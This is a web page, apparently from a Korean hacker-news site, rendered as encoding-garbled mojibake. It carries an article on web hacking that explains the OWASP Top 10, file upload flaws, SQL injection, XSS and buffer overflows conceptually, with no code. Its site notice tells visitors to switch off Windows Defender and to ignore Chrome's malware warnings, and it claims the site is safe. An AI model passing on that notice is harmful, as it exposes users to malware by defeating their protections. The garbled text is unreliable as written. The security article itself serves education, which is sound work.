ÇØÄ¿Áî´º½º / ÇØÄ¿´ëÇÐ

Donation bitcoin(±âºÎ¿ë ºñÆ®ÄÚÀÎ ÁÖ¼Ò)

¡¡
1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4
¡¡
±âºÎÇϽŠºñÆ®ÄÚÀÎÀº "º¸¾È Ãë¾à °èÃþ"À» À§ÇØ »ç¿ëµÇ°í ÀÖ½À´Ï´Ù.
¡¡
¡¡

Donation bitcoin(±âºÎ¿ë ºñÆ®ÄÚÀÎ ÁÖ¼Ò)

¡¡
1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4
¡¡
±âºÎÇϽŠºñÆ®ÄÚÀÎÀº "º¸¾È Ãë¾à °èÃþ"À» À§ÇØ »ç¿ëµÇ°í ÀÖ½À´Ï´Ù.
¡¡

°øÁö

¡¡

1. MS ¿§Áö ºê¶ó¿ìÀú¿¡¼­ÀÇ °æ°íâÀº 'À©µµ¿ì µðÆæ´õ'¸¦ ²ô½Ã¸é µË´Ï´Ù.

             'À©µµ¿ì µðÆæ´õ ²ô±â'

2. Å©·Ò ºê¶ó¿ìÀú·Î Á¢¼Ó½Ã ³ª¿À´Â ¾Ç¼ºÄÚµå °æ°íâÀº ±¸±Û Å©·ÒÀÇ ¿¡·¯, Áï ¿ÀŽ(ŽÁö ¿À·ù)À̹ǷΠ¹«½ÃÇÏ½Ã¸é µË´Ï´Ù.

3. ÀÌ »çÀÌÆ®´Â ¾ÈÀüÇÏ¸ç ±ú²ýÇÏ´Ù´Â °ÍÀ» ¾Ë·Á µå¸³´Ï´Ù.

4. ¹«°íÇÑ »çÀÌÆ®µé¿¡ ´ëÇÑ °ø·æ ±â¾÷ ºê¶ó¿ìÀúµéÀÇ ¹«Â÷º°ÀûÀÎ 'ŽÁö ¿À·ù ȾÆ÷'°¡ »ç¿ëÀÚµéÀÇ Á¤º¸ °øÀ¯ÀÇ ÀÚÀ¯¸¦ ħÇØÇÏ°í ÀÖ½À´Ï´Ù. ÀÌ¿¡ ´ëÀÀÇÏ¿© ÀÌ ±â¾÷µéÀ» »ó´ë·Î ¼Ò¼ÛÀ» ÁغñÇÏ°í ÀÖ½À´Ï´Ù.

¡¡

Ãâó: ±è°æ°ï
À帣: À¥ÇØÅ·
´Ü¼øÇÏ°í À§ÇèÇÑ À¥ ÇØÅ·ÀÇ ¼¼°è  
´Ü¼øÇÏ°í À§ÇèÇÑ À¥ ÇØÅ·ÀÇ ¼¼°è

±è°æ°ï¦¢A3½ÃÅ¥¸®Æ¼ÄÁ¼³ÆÃ

±â¾÷ÀÇ IT ȯ°æÀÌ À¥ ±â¹ÝÀ¸·Î ÁøÈ­Çϸ鼭 À¥ ÇØÅ·À¸·Î ÀÎÇÑ ÇÇÇØ°¡ Ä¿Áö°í ÀÖ´Ù. »ó´ëÀûÀ¸·Î °íµµÀÇ ±â¼úÀûÀÎ ¿ä±¸¸¦ ÇÏÁö ¾Ê´Â ¹Ý¸é ±× ÆıÞÈ¿°ú´Â ¾öû³ª´Ù´Â Á¡¿¡¼­ À¥ ÇØÅ·Àº ´õ¿í ÁÖÀǸ¦ ¿äÇÑ´Ù. ¿©±â¼­´Â À¥ ÇØÅ·ÀÇ °³³ä°ú ±â¼ú, ´ëÀÀ¹æ¾ÈÀ» »ìÆ캸°í ½ÇÀü À¥ ÇØÅ· µ¥¸ð¸¦ ÅëÇØ ¹æ¾îÀû ÀǹÌÀÇ ÇØÅ·¿¡ ´ëÇØ °í¹ÎÇØ º»´Ù.

º¸¾È ÄÁ¼³Æà ¾÷üµéÀÌ ±ÝÀ¶±Ç, °ø°ø±â°ü, ´ë±â¾÷ µî ´Ù¼öÀÇ »çÀÌÆ®¿¡ ´ëÇØ ¸ðÀÇÇØÅ·(Penetration Test : ħÅõ Å×½ºÆ®)À» ¼öÇàÇØ º» °á°ú¿¡ µû¸£¸é ÃÖ±ÙÀÇ ÇØÅ· ¼ö¹ýÀº ¸¹Àº º¯È­¸¦ °ÅµìÇÏ°í ÀÖ´Ù. ¹ö±× Æ®·¢À» ÃÖÃÊ·Î ¸¸µç Aleph OneÀÌ Áö³­ 1996³â ¡®phrack¡¯À̶ó´Â ÇØÄ¿ ÀâÁö¿¡ ¡®Smashing The Stack For Fun And Profit¡¯À̶ó´Â Á¦¸ñÀ¸·Î ¹öÆÛ ¿À¹öÇÃ·Î¿ì °ø°Ý¿¡ ´ëÇØ Ã³À½ °ø°³ÇÑ ÀÌÈÄ ÀÌ¿Í °ü·ÃµÈ ¸¹Àº °ø°ÝÀÌ ³ª¿Ô´Ù. ÀÌÈÄ Æ÷¸ä ½ºÆ®¸µ ¹ö±×, ·¹À̽º ÄÁµð¼Ç Ãë¾àÁ¡ µî ½Ã½ºÅÛ°ú ³×Æ®¿öÅ©¿¡ ´ëÇÑ °ø°ÝÀÌ ÁÖ¸¦ ÀÌ·ç¾ú´Ù. ƯÈ÷ ±× ½ÃÀý¿¡´Â ±¹³» º¸¾È ½ÃÀåÀÌ ¾ÆÁ÷ È°¼ºÈ­µÇÁö ¾Ê¾Ò°í ¹æÈ­º®(ħÀÔÂ÷´Ü½Ã½ºÅÛ)À̳ª IDS(ħÀÔŽÁö½Ã½ºÅÛ)¿Í °°Àº º¸¾È ¼Ö·ç¼ÇÀÌ ¾ø¾ú´ø ½ÃÀýÀ̾ú±â ¶§¹®¿¡ ÁÖ·Î ½Ã½ºÅÛ¿¡ ´ëÇÑ ÇØÅ·ÀÌ ÀÌ·ç¾îÁ³´Ù.

±×·¯³ª ÃÖ±Ù¿¡´Â ´ë±â¾÷ºÎÅÍ Áß¼Ò±â¾÷±îÁö ¹æÈ­º®°ú IDS¸¦ µµÀÔÇϸ鼭 ½ÇÁ¦·Î ¿ÜºÎ¿¡¼­ ¿ø°ÝÀ¸·Î ½Ã½ºÅÛÀÇ Ãë¾àÇÑ µ¥¸óÀ» ÀÌ¿ëÇÑ °ø°ÝÀÌ Àǹ̰¡ ¾ø¾îÁö¸é¼­ °ø°Ý ½Ãµµµµ Á¡Â÷ ÁÙ¾îµé¾ú´Ù. À¥ÀÌ »ç¿ëÇÏ´Â 80¹ø Æ÷Æ®¸¦ Á¦¿ÜÇÏ¸é ´Ù¸¥ Æ÷Æ®µéÀ» ´Ù ¸·¾Æ³õ±â ¶§¹®ÀÌ´Ù. ÀÌ·¸°Ô µÇÀÚ ÇØÄ¿µéÀº ´ë»ó ½Ã½ºÅÛÀ» ħÅõÇϱâ À§ÇØ 80¹ø À¥ Æ÷Æ®¸¦ ÁýÁß °ø·«ÇÏ°í ÀÖ´Ù. 80¹ø À¥ Æ÷Æ®´Â Á¤»óÀûÀ¸·Î ¼­ºñ½º°¡ µÇ´Â Æ÷Æ®À̹ǷΠ±âº»ÀûÀ¸·Î ¿­¾î¾ß ÇÏ¸ç °ø°Ý¿¡ ´ëÇÑ Å½Áö³ª ¡Èĸ¦ ¾Ë±â Èûµé´Ù´Â ´ÜÁ¡ÀÌ ÀÖ´Ù. ÀÌó·³ 80 Æ÷Æ®¸¦ ÀÌ¿ëÇÑ °ø°Ý ±â¹ýµéÀÌ µîÀåÇÏ°í, ´Ù¾çÇÑ Ä§ÇØ»ç°í°¡ ¹ß»ýÇÏÀÚ Á¡Â÷ À¥ ÇØÅ·¿¡ ´ëÇÑ ´ëÀÀÃ¥À» ¸¶·ÃÇÏ´Â ¿òÁ÷ÀÓÀÌ ½ÃÀ۵ƴÙ. ¿©±â¼­´Â À¥À» ÀÌ¿ëÇÑ °ø°Ý ¹æ¹ýµéÀº ¾î¶² °ÍÀÌ ÀÖÀ¸¸ç ½ÇÁ¦ À¥À» ÅëÇÑ ½Ã½ºÅÛ Ä§Åõ°úÁ¤À» º¸¿©ÁÖ°í ´ëÀÀ ¹æ¾ÈÀ» »ìÆ캻´Ù.

À¥ ¾ÖÇø®ÄÉÀÌ¼Ç 10´ë Ãë¾àÁ¡

¸ðÀÇÇØÅ·À» ¼öÇàÇϸ鼭 À¥ ¼­¹öÀÇ Ãë¾àÁ¡¿¡ ´ëÇØ Åë°è¸¦ ³»º¸¸é ¡®ÆÄÀÏ ¾÷·Îµå Ãë¾àÁ¡¡¯°ú ¡®SQL ÀÎÁ§¼Ç(Injection) Ãë¾àÁ¡¡¯ÀÌ °¡Àå ¸¹¾Ò´Ù. ÀÌ µÎ °¡Áö´Â Á÷Á¢ÀûÀ¸·Î ½Ã½ºÅÛ ±ÇÇÑ°ú µ¥ÀÌÅͺ£À̽ºÀÇ ³»¿ëÀ» ÃßÃâÇÒ ¼ö ÀÖ´Â À§ÇèÇÑ Ãë¾àÁ¡ÀÌ´Ù. À̹ۿ¡µµ »ç¿ëÀÚÀÇ ÄíÅ° Á¤º¸¸¦ °¡Á®¿À´Â Å©·Î½º »çÀÌÆ® ½ºÅ©¸³Æ®(XSS) Ãë¾àÁ¡, µð·ºÅ丮 ³»ÀÇ ÆÄÀÏ ¸ñ·ÏÀ» ¿­¶÷ÇÒ ¼ö ÀÖ´Â µð·ºÅ丮 ¸®½ºÆà Ãë¾àÁ¡, »óÀ§ µð·ºÅ丮·Î ¿Ã¶ó°¡¼­ ½Ã½ºÅÛ ÆÄÀÏÀ» °¡Á®¿Ã ¼ö ÀÖ´Â µð·ºÅ丮 Ž»ö(Directory Tra versal) Ãë¾àÁ¡, ÄíÅ° Á¶ÀÛ, ¸®¹ö½º ÅÚ³Ý µî ´Ù¾çÇÑ À¥ ÇØÅ· ±â¹ýÀÌ Á¸ÀçÇÑ´Ù.

°³¹æÇü À¥ ¾ÖÇø®ÄÉÀÌ¼Ç º¸¾È ÇÁ·ÎÁ§Æ®(OWASP)¿¡¼­´Â <Ç¥ 1>°ú °°ÀÌ °¡Àå ½É°¢ÇÑ À¥ ¾ÖÇø®ÄÉÀÌ¼Ç Ãë¾àÁ¡°ú µ¥ÀÌÅͺ£À̽º º¸¾È Ãë¾àÁ¡ 10°¡Áö¸¦ ¸Å³â ¹ßÇ¥ÇÏ°í ÀÖ´Ù(OWASP´Â À¥ ¾ÖÇø®ÄÉÀÌ¼Ç º¸¾È¿¡ ºñÀüÀ» °¡Áö°í ÀÖ´Â ±â¾÷°ú °³ÀεéÀÌ ÀÚ¹ßÀûÀ¸·Î Âü¿©ÇÑ ¿ÀÇ ÇÁ·ÎÁ§Æ®·Î ÇØÅ· °ü·Ã ´Ù¾çÇÑ ÀÚ·á¿Í ÅøÀ» Á¦°øÇÏ´Â ±ÇÀ§ÀÖ´Â ´Üü´Ù). ÀÌ ¸®½ºÆ®´Â ´ëÇ¥ÀûÀ¸·Î À¥¿¡¼­ ÀϾ ¼ö ÀÖ´Â Ãë¾àÁ¡µé¿¡ ´ëÇÑ °Íµé·Î ÇØÅ·À» ¹æÁöÇϴµ¥ ¸Å¿ì À¯¿ëÇÏ´Ù.

ÀԷ°ª °ËÁõ ºÎÀç(A1)¸¦ ÀÌ¿ëÇÑ ÇØÅ· ¹æ¹ý¿¡´Â URL °­Á¦ Á¢¼Ó, ¸í·É¾î »ðÀÔ, Å©·Î½º »çÀÌÆ® ½ºÅ©¸³ÆÃ, ¹öÆÛ ¿À¹öÇ÷οì, Æ÷¸Ë ½ºÆ®¸µ °ø°Ý, SQL ±¸¹® »ðÀÔ, ÄíÅ° Á¶ÀÛ, È÷µç Çʵå Á¶ÀÛ µî ´Ù¾çÇÏ´Ù. ½ÇÁ¦ ¸ðÀÇÇØÅ·À» ÇØ º¸¸é ÀÔ·Â °ª °ËÁõ ºÎÀç·Î ÀÎÇØ À¥ ¾ÖÇø®ÄÉÀ̼ÇÀÌ °ø°Ý´çÇÏ´Â °æ¿ì°¡ »ó´çÈ÷ ¸¹Àºµ¥, °¡Àå ½¬¿ì¸é¼­µµ ½É°¢ÇÑ ÇÇÇظ¦ ÀÔÈ÷´Â ÆÄÀÏ ¾÷·Îµå °ø°Ýµµ °Ô½ÃÆÇÀ̳ª ÀÚ·á½Ç¿¡ ÆÄÀÏÀ» ¾÷·ÎµåÇÏ´Â ºÎºÐ¿¡¼­ ÆÄÀÏ È®ÀåÀÚ¿¡ ´ëÇÑ ÀûÀýÇÑ °ËÁõÀÌ ¾ø¾î °ø°ÝÀÚ¿¡°Ô À¥ ¼­¹öÀÇ ±ÇÇÑÀ» ÁÖ°í ÀÖ´Ù.

Ãë¾àÇÑ Á¢±Ù ÅëÁ¦ Ãë¾àÁ¡(A2)À» ÀÌ¿ëÇÏ´Â ´ëÇ¥ÀûÀÎ °æ¿ì´Â °ü¸®ÀÚ ÆäÀÌÁö°¡ ³ëÃâµÇ´Â °ÍÀÌ´Ù. ½ÇÁ¦ ¸¹Àº À¥ »çÀÌÆ®¿¡´Â ¿ø°Ý¿¡¼­ À¥ »çÀÌÆ®¸¦ °ü¸®ÇÒ ¼ö ÀÖ´Â °ü¸®ÀÚ ÆäÀÌÁö°¡ Á¸ÀçÇÑ´Ù. ±×·¯³ª °ü¸®ÀÚ ÆäÀÌÁö°¡ ¾î¶² ÀÎÁõµµ ¾øÀÌ ¿ÜºÎ¿¡ ³ëÃâµÅ ÀÖÀ¸¸é °ø°ÝÀÚ´Â ½±°Ô °ü¸®ÀÚ ÆäÀÌÁö¿¡ Á¢±ÙÀ» ÇÒ ¼ö ÀÖ´Ù. °ü¸®ÀÚ ÆäÀÌÁö¿¡´Â º¸Åë ¾ÆÀ̵ð¿Í Æнº¿öµå¸¦ ÅëÇØ ÀÎÁõÀ» °ÅÄ¡Áö¸¸ °ü¸®ÀÚ ÆäÀÌÁö ³»¿¡ Á¸ÀçÇÏ´Â ÆäÀÌÁö¿¡ ´ëÇؼ­´Â ÀÎÁõÀ» °ÅÄ¡Áö ¾Ê´Â °æ¿ìµµ Á¾Á¾ ÀÖ´Ù. ¶ÇÇÑ °ü¸®ÀÚ ·Î±×ÀÎ ÆäÀÌÁö°¡ ´©±¸¿¡°Ô³ª µå·¯³ª Àֱ⠶§¹®¿¡ °ø°ÝÀÚ´Â SQL ±¸¹® »ðÀÔ °ø°ÝÀ̳ª °ü¸®ÀÚ °èÁ¤/Æнº¿öµå ÃßÃø °ø°ÝÀ» ÅëÇØ °ü¸®ÀÚ ±ÇÇÑÀ¸·Î À¥ »çÀÌÆ®¿¡ Á¢¼ÓÇÒ ¼ö ÀÖ´Â °æ¿ìµµ ¸¹´Ù.

<Ç¥1> À¥ ¾ÖÇø®ÄÉÀÌ¼Ç 10´ë Ãë¾àÁ¡

±¸ºÐ Èþ¸ñ ³»¿ë
A1 ÀÔ·Â °ª °ËÁõ ºÎÀç À¥ ¿äû Á¤º¸°¡ À¥ ¾ÖÇø®ÄÉÀ̼ǿ¡ ÀÇÇØ Ã³¸®µÇ±â ÀÌÀü¿¡ ÀûÀýÇÑ °ËÁõÀÌ ÀÌ·ç¾îÁö°í ÀÖÁö ¾Ê´Ù. °ø°ÝÀÚ´Â ÀÌ Ãë¾àÁ¡À» ÀÌ¿ëÇØ À¥ ¾ÖÇø®ÄÉÀ̼ÇÀÇ ¹é¿£µå ÄÄÆ÷³ÍÆ®¸¦ °ø°ÝÇÒ ¼ö ÀÖ´Ù.
A2 Ãë¾àÇÑ Á¢±Ù ÅëÁ¦ ÀÎÁõµÈ »ç¿ëÀÚ°¡ ¼öÇàÇÒ ¼ö ÀÖ´Â ÀÛ¾÷À» ÀûÀýÈ÷ Á¦ÇÑÇÏÁö ¾Ê°í ÀÖ´Ù. °ø°ÝÀÚ´Â ÀÌ Ãë¾àÁ¡À» ÀÌ¿ëÇØ ´Ù¸¥ »ç¿ëÀÚÀÇ °ÔÁ¤¿¡ Á¢±ÙÇϰųª ¹Î°¨ÇÑ Á¤º¸°¡ ´ã±ä ÆÄÀÏÀ» ¿­¶÷Çϰųª Çã¿ëµµÁö ¾ÊÀº ÀÛ¾÷À» ¼öÇàÇÒ ¼ö ÀÖ´Ù.
A3 Ãë¾àÇÑ ÀÎÁõ ¹× ¼¼¼Ç °ü¸® °ÔÁ¤ ÅäÅ«°ú ¼¼¼Ç ÅäÅ«ÀÌ ÀûÀýÈ÷ º¸È£µÇ°í ÀÖÁö ¾Ê´Ù. °ø°ÝÀÚ´Â ¾ÏÈ£³ª Å°, ¼¼¼Ç ÄíÅ°, ±âŸ ÀÎÁõ °ü·Ã ÅäÅ«À» °ø°ÝÇØ ÀÎÁõÀ» ¿ìȸÇÏ°í ´Ù¸¥ »ç¿ëÀÚÀÇ ID¸¦ °¡ÀåÇÒ ¼ö ÀÖ´Ù.
A4 ÇÁ·Î½º »çÀÌÆ®
½ºÅ©¸³ÆÃ(XSS) Ãë¾àÁ¡
À¥ ¾ÖÇø®ÄÉÀ̼ÇÀÌ ´Ù¸¥ »ç¿ëÀÚÀÇ ºê¶ó¿ìÀú¸¦ °ø°ÝÇÏ´Â µµ±¸·Î »ç¿ëµÉ ¼ö ÀÖ´Ù. °ø°ÝÀÌ ¼º°øÇϸé ÀÏ¹Ý »ç¿ëÀÚÀÇ ¼¼¼Ç ÅäÅ«ÀÌ ³ëÃâµÇ°Å³ª »ç¿ëÀÚÀÇ ÄÄÇ»Å͸¦ °ø°ÝÇϰųª, ´Ù¸¥ »ç¿ëÀÚ¸¦ ¼ÓÀ̱â À§ÇØ À§Á¶µÈ ÄÁÅÙÃ÷¸¦ º¸¿©ÁÙ ¼öµµ ÀÖ´Ù.
A5 ¹öÆÛ ¿À¹öÇ÷οì À¥ ¾ÖÇø®ÄÉÀÌ¼Ç ÄÄÆ÷³ÍÆ®°¡ »ç¿ëÀÚÀÇÀÔ·Â °ªÀ» ÀûÀýÈ÷ Á¡°ËÇÏÁö ¾Ê´Â ¾ð¾îµµ ÀÛ¼ºµÅ ´Ù¿îµÉ ¼ö ÀÖ´Ù. Ư¼öÇÑ °æ¿ì¿¡´Â °ø°ÝÀÚ°¡ ÇØ´ç ÇÁ·Î¼¼½ºÀÇ ±ÇÇÑÀ» ȹµæÇÒ ¼ö ÀÖ´Ù. ÀÌ ÄÄÆ÷³ÍÆ®·Î´Â CGI, ¶óÀ̺귯¸®, Çϵå¿þ¾î µå¶óÀ̹ö, À¥ ¾ÖÇø®ÄÉÀÌ¼Ç ¼­¹ö ÄÄÆ÷³ÍÆ® µîÀÌ Æ÷ÇԵȴÙ.
A6 »ðÀÔ Ãë¾àÁ¡ À¥ ¾ÖÇø®ÄÉÀ̼ÇÀÌ ¿ÜºÎ ½Ã½ºÅÛÀ̳ª ÀÚü ¿î¿µÃ¼Á¦¿¡ Á¢±ÙÇÒ ¶§ ÀԷ¹ÞÀº ÀÎÀÚ¸¦ ±×´ë·Î Àü´ÞÇÑ´Ù. °ø°ÝÀÚ°¡ ÇØ´ç ÀÎÀÚ¿¡ ¾ÇÀÇÀûÀÎ ¸í·É¾î¸¦ ÀÔ·ÂÇϸé ÇØ´ç ¿ÜºÎ ½Ã½ºÅÛÀº À¥ ¾ÖÇø®ÄÉÀ̼ÇÀ¸·Î ÀԷ¹ÞÀº ¸í·É¾î¸¦ ½ÇÇàÇÒ ¼ö ÀÖ´Ù.
A7 ºÎÀûÀýÇÑ ¿¡·¯ ó¸® ÀÏ»óÀûÀÎ ¿î¿ë °úÁ¤ Áß¿¡ ¹ß»ýÇÏ´Â ¿¡·¯ »óȲ¿¡ ´ëÇØ ÀûÀýÇÑ Ã³¸®°¡ ÀÌ·ç¾îÁöÁö ¾Ê´Â´Ù. °ø°ÝÀÚ°¡ À¥ ¾ÖÇø®ÄÉÀ̼ÇÀÌ Ã³¸®ÇÏÁö ¸øÇÏ´Â ¿¡·¯°¡ ¹ß»ýÇϵµ·Ï À¯µµÇØ ÇØ´ç ½Ã½ºÅÛ¿¡ ´ëÇÑ »ó¼¼ Á¤º¸¸¦ ȹµæÇϰųª ¼­ºñ½º¸¦ ¹æÇØÇϰųª º¸¾È ¸ÞÄ¿´ÏÁòÀÌ ÀÛµ¿ÇÏÁö ¾Êµµ·Ï ÇÒ ¼ö ÀÖÀ¸¸ç ½ÉÁö¾î ¼­¹ö°¡ ´Ù¿îµÉ ¼öµµ ÀÖ´Ù.
A8 Ãë¾àÇÑ Á¤º¸ ÀúÀå ¹æ½Ä À¥ ¾ÖÇø®ÄÉÀ̼ÇÀº Á¤º¸³ª ÀÎÁõ °ü·Ã ÅäÅ«À» º¸È£Çϱâ À§ÇØ ¾Ïȣȭ¸¦ ÀÚÁÖ »ç¿ëÇÑ´Ù. ¾Ïȣȭ °ü·Ã ±â´ÉÀ̳ª Äڵ带 ÀûÀýÇÏ°Ô ±¸ÇöÇϱ⠾î·Æ´Ù´Â »ç½ÇÀº ÀÌ¹Ì ³Î¸® ¾Ë·ÁÁ® Àִµ¥, ¸¹Àº °æ¿ì ¿ÀÈ÷·Á º¸¾È»ó ¹Ù¶÷Á÷ÇÏÁö ¾ÊÀº °á°ú¸¦ ÃÊ·¡ÇÑ´Ù.
A9 ¼­ºñ½º ¹æÇØ °ø°Ý °ø°ÝÀÚ°¡ ´Ù¸¥ Á¤´çÇÑ »ç¿ëÀÚ°¡ »çÀÌÆ®¿¡ Á¢¼ÓÇϰųª ¾ÖÇø®ÄÉÀ̼ÇÀ» »ç¿ëÇÏ´Â °ÍÀ» ¹æÇØÇϱâ À§ÇØ À¥ ¾ÖÇø®ÄÉÀ̼ÇÀÇ ¸®¼Ò½º¸¦ °í°¥½Ãų ¼ö ÀÖ´Ù. ¶ÇÇÑ ´Ù¸¥ »ç¿ëÀÚ°¡ º»ÀÎ ¼ÒÀ¯ÀÇ °èÁ¤À» »ç¿ëÇÏÁö ¸øÇϵµ·Ï Àá±Û ¼ö ÀÖÀ¸¸ç, ½ÉÁö¾î À¥ ¾ÖÇø®ÄÉÀÌ¼Ç Àüü¸¦ ¸ØÃâ ¼öµµ ÀÖ´Ù.
A10 ºÎÀûÀýÇÑ È¯°æ ¼³Á¤ °­È­µÈ ¼­¹ö ȯ°æ Ç¥ÁØÀ» ¼³Á¤ÇÏ´Â °ÍÀº ¾ÈÀüÇÑ À¥ ¾ÖÇø®ÄÉÀÌ¼Ç È¯°æÀ» ¸¸µå´Âµ¥ °áÁ¤ÀûÀÎ ¿ªÇÒÀ» ÇÑ´Ù. ¼­¹ö´Â º¸¾È¿¡ ¿µÇâÀ» ¹ÌÄ¡´Â ´Ù¾çÇÑ È¯°æ ¼³Á¤ ¿É¼ÇÀÌ Àմµ¥ º¥´õ ÃâÇÏ ½Ã¿¡´Â ±âº»ÀûÀ¸·Î ¾ÈÀüÇÏÁö ¾ÊÀº »óÅ·ΠÃâ½ÃµÈ´Ù.

Ãë¾àÇÑ ÀÎÁõ ¹× ¼¼¼Ç °ü¸®(A3)¸¦ ÀÌ¿ëÇÑ °ø°Ý ±â¹ý¿¡´Â ´Ù¸¥ »ç¿ëÀÚÀÇ ¼¼¼ÇÀ» °¡·Îä À̸¦ µµ¿ëÇÏ´Â ¼¼¼Ç ÇÏÀÌÀçÅ· °ø°ÝÀÌ ÀÖ´Ù. ±ÝÀ¶±ÇÀ̳ª ÀºÇà±Ç °°Àº °÷Àº °øÀÎÀÎÁõ¼­¸¦ ±â¹ÝÀ¸·Î »ç¿ëÀÚ ÀÎÁõÀ» ÇÏÁö¸¸ ÀϹÝÀûÀÎ »çÀÌÆ®µéÀº ´Ü¼øÈ÷ ¾ÆÀ̵ð¿Í Æнº¿öµå ¸¸À¸·Î ÀÎÁõÀ» ÇÑ´Ù. ¶ÇÇÑ ·Î±×ÀÎÇÑ ÈÄ »ç¿ëÀÚÀÇ ÄíÅ°³ª ¼¼¼Ç °ªÀ» º¸¸é À¥ ¼­¹ö¿¡¼­ Á¦°øÇÏ´Â ¼¼¼Ç °ªÀÌ ¾Æ´Ñ °³¹ßÀÚµéÀÌ ÀÚüÀûÀ¸·Î »ç¿ëÀÚ¸¦ ÀÎÁõÇϰųª ½Äº°Çϱâ À§ÇÑ ÄíÅ° °ªµéÀ» Á¦°øÇÏ´Â °æ¿ì°¡ ÀÖ´Ù. ¹®Á¦´Â ÀÌ·± ÄíÅ° °ª¿¡ »ç¿ëÀÚÀÇ Áß¿äÇÑ Á¤º¸, ¿¹¸¦ µé¸é À̸§, »ç¹ø, ½ÉÁö¾î Áֹεî·Ï¹øÈ£°¡ Æ÷ÇÔµÈ »ç·Êµµ ¸¹´Ù´Â °ÍÀÌ´Ù. ÀÌ Ãë¾àÁ¡Àº XSS Ãë¾àÁ¡°ú °°ÀÌ »ç¿ëµÇ´Â °æ¿ì°¡ ¸¹À¸¸ç º¸Åë °ø°ÝÀÚ´Â XSS Ãë¾àÁ¡À¸·Î ´Ù¸¥ »ç¿ëÀÚÀÇ ÄíÅ° °ªÀ» ÃßÃâÇÑ ÈÄ À̸¦ ÀÌ¿ëÇØ ´Ù¸¥ »ç¿ëÀÚÀÇ Á¤º¸¸¦ ¿­¶÷Çϰųª ±× »ç¿ëÀÚ·Î À¥ »çÀÌÆ®¸¦ ÀÌ¿ëÇÑ´Ù.

XSS Ãë¾àÁ¡(A4)À» ÀÌ¿ëÇØ °ø°ÝÇÏ´Â ¹æ¹ý¿¡´Â »ç¿ëÀÚÀÇ ¼¼¼Ç ÄíÅ° °ªÀ» À¯ÃâÇϰųª ´Ù¸¥ ÆäÀÌÁö, »çÀÌÆ®·ÎÀÇ °­Á¦ À̵¿ ȤÀº ÇöÀç º¸¿©Áö´Â ³»¿ëÀ» º¯Á¶ÇÏ´Â °Í µîÀÌ ÀÖ´Ù. XSS Ãë¾àÁ¡Àº À¥ ¼­¹ö¿¡ Á÷Á¢ÀûÀÎ ÇÇÇظ¦ ÀÔÈ÷Áö´Â ¾Ê°í XSS Ãë¾àÁ¡ÀÌ Á¸ÀçÇÏ´Â »çÀÌÆ® ¹æ¹®ÀÚ¸¦ ÁßÁ¡ÀûÀ¸·Î °ø°ÝÇÑ´Ù. XSS´Â ±ÝÀ¶Á¤º¸¸¦ »©°¡´Â °ø°Ý ¹æ¹ýÀÎ ÇǽÌ(phishing)¿¡µµ »ç¿ëµÇ´Âµ¥, ¿¹¸¦ µé¾î °ø°ÝÀڴ ƯÁ¤ »ç¿ëÀÚ¿¡°Ô ¸ÞÀÏÀ» º¸³» »ç¿ëÀÚ°¡ ¸ÞÀÏÀ» ¿­¶÷Çϸé ƯÁ¤ ÀºÇà »çÀÌÆ®°¡ ¶ß¸ç »ç¿ëÀÚ¿¡°Ô °øÀÎÀÎÁõ¼­ ±â°£ÀÌ ¸¸·áµÇ¾ú´Ù¸ç °è¼Ó »ç¿ëÇÏ·Á¸é °³ÀÎÁ¤º¸¸¦ ÀÔ·ÂÇضó°í ÇÏ´Â ÆäÀÌÁö¸¦ Ãâ·ÂÇÑ´Ù. ÀÏ¹Ý »ç¿ëÀÚ´Â ¾Æ¹«·± ÀǽɾøÀÌ °³ÀÎÁ¤º¸¸¦ ÀÔ·ÂÇÒ °ÍÀÌ°í ÀÌ Á¤º¸´Â °í½º¶õÈ÷ °ø°ÝÀÚ ¼Õ¿¡ µé¾î°£´Ù.

¹öÆÛ ¿À¹öÇ÷οì(A5)´Â ÀÌ¹Ì À¯´Ð½º ½ÃÀýºÎÅÍ Á¸ÀçÇÏ´ø Ãë¾àÁ¡ÀÌ´Ù. OS¿¡¼­ºÎÅÍ ¾ÆÁÖ ÀÛÀº ÇÁ·Î±×·¥¿¡±îÁö Á¸ÀçÇÒ ¼ö ÀÖ´Â Ãë¾àÁ¡À̸ç À¥ ¾ÖÇø®ÄÉÀ̼ǿ¡¼­µµ ¸¶Âù°¡Áö´Ù. ¹öÆÛ ¿À¹öÇ÷οì´Â ÇÁ·Î±×·¡¸Ó°¡ ÇÁ·Î±×·¥À» ¸¸µé ¶§ ¹öÆÛÀÇ Å©±â¸¦ Á¤ÇÏ°í »ç¿ëÀÚÀÇ ÀÔ·ÂÀ» ¹ÞÀ» ¶§ ÀûÀýÈ÷ ¹öÆÛÀÇ Å©±âº¸´Ù ´õ ¸¹ÀÌ µé¾î¿À´Â ÀÔ·Â °ªÀ» °ËÁõÇÏÁö ¾Ê¾Æ ¹ß»ýÇÏ´Â Ãë¾àÁ¡ÀÌ´Ù. °ø°ÝÀÚ´Â À̸¦ ÀÌ¿ëÇØ ÇÁ·Î±×·¥ÀÇ È帧À» º¯°æ½ÃÄÑ °ø°ÝÀÚ°¡ ¿øÇÏ´Â ¸í·É¾î¸¦ ½ÇÇàÇϵµ·Ï ÇÑ´Ù.

¸ðÀÇÇØÅ· ½Ã ½ÇÁ¦ À¥ ¾ÖÇø®ÄÉÀ̼ǿ¡ Á¸ÀçÇÏ´Â ¹öÆÛ ¿À¹öÇ÷οì Ãë¾àÁ¡À» ºÐ¼®ÇÏ°í °ø°ÝÇÏ´Â °æ¿ì´Â µå¹°´Ù. »ó¿ë ¾ÖÇø®ÄÉÀ̼ǿ¡¼­ °ø°³µÈ ¹öÆÛ ¿À¹öÇÃ·Î¿ì °ø°ÝÀº °¡´ÉÇÏÁö¸¸, º¸Åë ¸ðÀÇÇØÅ·¿¡´Â ½Ã°£Àû Á¦¾àÀÌ ¸¹±â ¶§¹®¿¡ ƯÁ¤ ¾ÖÇø®ÄÉÀ̼ǿ¡ ´ëÇØ ¹öÆÛ ¿À¹öÇ÷οì Ãë¾àÁ¡À» ã°í °ø°ÝÇϱâ¶õ ½±Áö ¾Ê´Ù. ¹°·Ð À©µµ¿ì IIS À¥¼­¹ö³ª ¾ÆÆÄÄ¡ À¥ ¼­¹ö¿¡¼­µµ ¹öÆÛ ¿À¹öÇ÷οì Ãë¾àÁ¡ÀÌ Á¸ÀçÇϹǷΠÀ̸¦ ÀÌ¿ëÇØ ¿ø°Ý¿¡¼­ À¥ ¼­¹ö ±ÇÇÑÀ» ȹµæÇϱ⵵ ÇÑ´Ù.

